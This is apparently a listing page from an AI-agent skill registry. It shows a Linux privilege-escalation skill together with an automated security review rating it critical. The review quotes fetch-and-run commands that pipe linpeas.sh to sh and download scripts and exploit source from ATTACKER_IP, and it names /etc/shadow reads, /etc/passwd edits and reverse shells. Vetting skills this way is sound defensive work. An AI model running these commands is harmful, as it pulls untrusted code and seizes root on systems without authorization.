This skill should be used when the user asks to "escalate privileges on Linux", "find privesc vectors on Linux systems", "exploit sudo misconfigurations", "abuse SUID binaries", "exploit cron jobs for root access", "enumerate Linux systems for privilege escalation", or "gain root access from low-privilege shell". It provides comprehensive techniques for identifying and exploiting privilege escalation paths on Linux systems.
68
82%
Does it follow best practices?
Run evals on this skill
Adds up to 20 points to the overall score
View guide
Critical
Do not install without reviewing
Security
4 findings: 2 critical severity, 1 high severity, 1 medium severity. Installing this skill is not recommended: please review these findings carefully if you do intend to do so.
Detected a suspicious URL in the skill instructions that could lead the agent to download and execute malicious scripts or binaries. This includes links to executables from untrusted sources, typosquatting of official packages, URL shorteners that obscure the destination, and personal file hosting services.
The GitHub and GTFOBins links point to known public tools/references, but the two http://ATTACKER_IP URLs are attacker-hosted direct script/source downloads (high-risk for malware distribution and unauthorized execution).
Detected high-risk code patterns in the skill content — including its prompts, tool definitions, and resources — such as data exfiltration, backdoors, remote code execution, credential theft, system compromise, supply chain attacks, and obfuscation techniques.
The document contains explicit, actionable instructions to perform unauthorized privilege escalation, remote code execution, credential theft, persistence, and data exfiltration, indicating clear malicious intent and high risk of abuse.
The skill handles credentials insecurely by requiring the agent to include secret values verbatim in its generated output. This exposes credentials in the agent’s context and conversation history, creating a risk of data exfiltration.
The skill instructs reading sensitive files (e.g., /etc/shadow), embedding plaintext passwords in commands (openssl ... newpassword), and to produce command output/screenshot evidence that would require the agent to capture and potentially output secret values or substitute user-provided secrets/IPs verbatim into commands.
The skill prompts the agent to compromise the security or integrity of the user’s machine by modifying system-level services or configurations, such as obtaining elevated privileges, altering startup scripts, or changing system-wide settings.
The skill explicitly instructs the agent to perform privilege escalation (sudo exploitation, LD_PRELOAD, SUID creation, modifying /etc/passwd, writable cron/script edits, reverse shells and kernel exploits) that would modify system state and obtain root on the machine it runs on.
Low
Low-risk findings.
2 low severity findings. Worth noting, but not necessarily harmful.
The skill exposes the agent to untrusted, user-generated content from public third-party sources, creating a risk of indirect prompt injection. This includes browsing arbitrary URLs, reading social media posts or forum comments, and analyzing content from unknown websites.
SKILL.md’s required workflow includes runtime fetching/execution of outsider-authored shell script content from public GitHub releases (e.g., `curl ... linpeas.sh | sh` and `wget http://ATTACKER_IP/linpeas.sh`), which would ingest arbitrary readable text into the agent context if the system captures/prints the fetched script output or content.
The skill fetches instructions or code from an external URL at runtime, and the fetched content directly controls the agent’s prompts or executes code. This dynamic dependency allows the external source to modify the agent’s behavior without any changes to the skill itself.
The skill fetches and executes remote code at runtime (curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh, wget http://ATTACKER_IP:8000/linpeas.sh then ./linpeas.sh, and wget http://ATTACKER_IP/exploit.c then gcc/exploit execution), so these URLs directly control executed code.
af7d491
If you maintain this skill, you can claim it as your own. Once claimed, you can manage eval scenarios, bundle related skills, attach documentation or rules, and ensure cross-agent compatibility.